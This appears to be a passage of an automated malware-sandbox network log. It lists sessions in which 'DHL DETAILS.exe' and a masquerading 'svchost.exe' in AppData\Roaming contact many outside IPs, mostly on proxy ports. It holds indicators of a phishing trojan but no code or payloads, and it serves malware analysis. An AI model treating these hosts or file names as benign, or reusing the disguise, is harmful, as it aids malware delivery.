Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7766	192.168.2.5	62183	64.137.93.62	6519	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7767	192.168.2.5	50372	178.128.157.114	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7768	192.168.2.5	64852	138.2.73.157	1080	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7769	192.168.2.5	50397	43.153.172.76	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7770	192.168.2.5	58908	43.153.172.76	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7771	192.168.2.5	58909	43.153.172.76	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7772	192.168.2.5	63164	185.101.16.52	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7773	192.168.2.5	58914	43.153.172.76	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7774	192.168.2.5	60800	45.196.151.59	5432	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7775	192.168.2.5	60814	100.1.53.24	5678	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7776	192.168.2.5	63765	103.118.46.177	8080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7777	192.168.2.5	56035	104.18.44.93	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7778	192.168.2.5	56041	172.67.181.103	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7779	192.168.2.5	60888	161.97.74.176	30000	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7780	192.168.2.5	60873	139.224.64.191	8081	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7781	192.168.2.5	61446	94.131.14.66	1081	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7782	192.168.2.5	54312	64.227.108.25	31908	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7783	192.168.2.5	65127	103.163.244.38	82	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7784	192.168.2.5	60825	103.132.92.110	1080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7785	192.168.2.5	51303	104.16.72.45	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7786	192.168.2.5	56040	91.189.177.188	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7787	192.168.2.5	50382	51.15.139.59	16379	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7788	192.168.2.5	51241	72.206.181.97	64943	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7789	192.168.2.5	65477	185.250.27.54	3128	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7790	192.168.2.5	63761	192.252.208.70	14282	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7791	192.168.2.5	51338	123.57.246.163	8118	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7792	192.168.2.5	58895	211.93.2.190	7302	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7793	192.168.2.5	62009	51.158.119.71	16379	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7794	192.168.2.5	65241	39.165.0.137	9002	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7795	192.168.2.5	51306	222.138.76.6	9002	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7796	192.168.2.5	49271	104.200.135.46	4145	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7797	192.168.2.5	63791	162.159.242.252	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7798	192.168.2.5	65402	201.13.147.161	5678	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7799	192.168.2.5	63813	172.67.150.173	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7800	192.168.2.5	62713	84.47.145.189	8080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7801	192.168.2.5	65433	47.243.92.199	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7802	192.168.2.5	65308	199.102.106.94	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7803	192.168.2.5	58677	97.74.233.206	40591	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7804	192.168.2.5	65443	185.101.16.52	80	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7805	192.168.2.5	58900	117.160.250.132	8899	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7806	192.168.2.5	62376	98.188.47.132	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7807	192.168.2.5	63770	60.205.132.71	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7808	192.168.2.5	57941	102.69.177.242	10081	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7809	192.168.2.5	57404	159.223.71.71	60512	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7810	192.168.2.5	63811	147.75.34.86	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7811	192.168.2.5	63771	43.255.113.232	85	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7812	192.168.2.5	63778	178.128.113.118	23128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7813	192.168.2.5	63816	139.224.64.191	8081	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7814	192.168.2.5	51273	172.67.182.126	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7815	192.168.2.5	58423	104.248.151.220	53177	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7816	192.168.2.5	63355	103.164.214.122	8080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7817	192.168.2.5	51245	38.162.3.74	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7818	192.168.2.5	63551	201.71.2.41	999	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7819	192.168.2.5	58578	162.241.66.135	36829	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7820	192.168.2.5	63803	103.66.177.17	32251	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7821	192.168.2.5	58872	107.180.90.88	20309	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7822	192.168.2.5	56684	103.242.119.88	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7823	192.168.2.5	59194	171.244.140.160	53749	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7824	192.168.2.5	51259	1.15.62.12	5678	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7825	192.168.2.5	63764	3.123.150.192	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7826	192.168.2.5	62921	200.6.175.10	59341	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7827	192.168.2.5	60815	189.240.60.168	9090	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7828	192.168.2.5	63762	103.132.92.110	1080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7829	192.168.2.5	50378	68.169.59.171	8380	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7830	192.168.2.5	51303	52.172.1.186	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7831	192.168.2.5	63634	51.79.87.144	41746	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7832	192.168.2.5	62904	103.109.59.209	1080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7833	192.168.2.5	65360	104.27.83.183	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7834	192.168.2.5	65365	104.21.64.208	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7835	192.168.2.5	59647	203.96.177.211	15901	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7836	192.168.2.5	65348	91.189.177.186	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7837	192.168.2.5	65353	120.26.0.11	8880	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7838	192.168.2.5	62446	111.53.178.249	7302	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7839	192.168.2.5	64070	66.228.33.190	44809	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7840	192.168.2.5	63888	209.126.104.38	12457	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7841	192.168.2.5	63577	201.13.147.161	5678	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7842	192.168.2.5	64236	45.11.95.166	6004	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7843	192.168.2.5	63810	46.253.143.144	1080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7844	192.168.2.5	61046	45.81.232.17	53288	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7845	192.168.2.5	60761	144.24.77.90	55555	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7846	192.168.2.5	63795	139.162.238.184	22243	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7847	192.168.2.5	63791	185.101.16.52	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7848	192.168.2.5	61146	185.196.182.22	8080	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7849	192.168.2.5	60012	194.85.135.243	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7850	192.168.2.5	60997	1.15.62.12	5678	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7851	192.168.2.5	60996	103.66.177.17	32251	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7852	192.168.2.5	63217	201.13.147.161	5678	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7853	192.168.2.5	60362	88.79.243.103	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7854	192.168.2.5	64795	211.93.2.190	7302	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7855	192.168.2.5	50288	50.63.12.33	30920	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7856	192.168.2.5	49272	103.118.46.177	8080	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7857	192.168.2.5	55416	72.217.216.239	4145	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7858	192.168.2.5	51317	72.195.34.35	27360	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7859	192.168.2.5	57401	51.89.173.40	27887	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7860	192.168.2.5	63027	201.71.2.103	999	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7861	192.168.2.5	55498	201.13.147.161	5678	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7862	192.168.2.5	55465	103.66.177.17	32251	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7863	192.168.2.5	65308	111.53.178.249	7302	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7864	192.168.2.5	63817	184.178.172.11	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7865	192.168.2.5	62084	51.91.109.83	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7866	192.168.2.5	61221	148.66.130.53	20870	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7867	192.168.2.5	60862	51.158.108.134	16379	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7868	192.168.2.5	64663	192.64.115.90	47100	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7869	192.168.2.5	65398	100.1.53.24	5678	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7870	192.168.2.5	59201	103.132.92.110	1080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7871	192.168.2.5	61292	45.11.95.166	6008	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7872	192.168.2.5	61366	47.89.184.18	3128	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7873	192.168.2.5	55544	103.66.177.17	32251	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7874	192.168.2.5	65035	46.226.148.105	36366	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7875	192.168.2.5	64922	162.241.50.179	53755	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7876	192.168.2.5	51338	217.182.153.29	12000	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7877	192.168.2.5	65292	94.23.220.136	19547	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7878	192.168.2.5	55529	72.217.216.239	4145	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7879	192.168.2.5	55598	193.151.130.114	8086	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7880	192.168.2.5	65321	133.232.90.155	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7881	192.168.2.5	61829	45.11.95.165	5019	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7882	192.168.2.5	55661	185.196.182.22	8080	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7883	192.168.2.5	55789	94.131.14.66	1081	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7884	192.168.2.5	49208	162.223.89.84	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7885	192.168.2.5	55534	72.195.34.35	27360	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7886	192.168.2.5	62917	16.162.211.90	1080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7887	192.168.2.5	63012	185.51.92.108	51327	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7888	192.168.2.5	62875	183.80.130.9	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7889	192.168.2.5	55613	50.63.12.33	14738	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7890	192.168.2.5	63687	45.173.12.141	1994	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7891	192.168.2.5	64002	45.11.95.165	5018	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7892	192.168.2.5	49276	132.148.128.88	26606	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7893	192.168.2.5	49284	197.248.86.237	32650	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7894	192.168.2.5	55499	88.79.243.103	3128	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7895	192.168.2.5	49459	51.75.126.150	37847	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7896	192.168.2.5	55616	111.53.178.249	7302	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7897	192.168.2.5	50202	163.172.94.175	21617	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7898	192.168.2.5	55803	72.217.216.239	4145	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7899	192.168.2.5	50499	51.145.176.250	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7900	192.168.2.5	55833	16.162.211.90	1080	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7901	192.168.2.5	50965	209.222.97.30	62543	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7902	192.168.2.5	50357	103.155.199.23	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7903	192.168.2.5	55821	72.195.34.35	27360	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7904	192.168.2.5	57107	107.175.37.178	43029	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7905	192.168.2.5	52196	185.67.95.91	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7906	192.168.2.5	56082	111.53.178.249	7302	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
